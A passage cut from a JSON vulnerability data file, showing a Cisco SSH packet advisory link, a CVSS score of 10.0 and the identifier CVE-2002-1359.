"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20021219-ssh-packet", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2002-1359
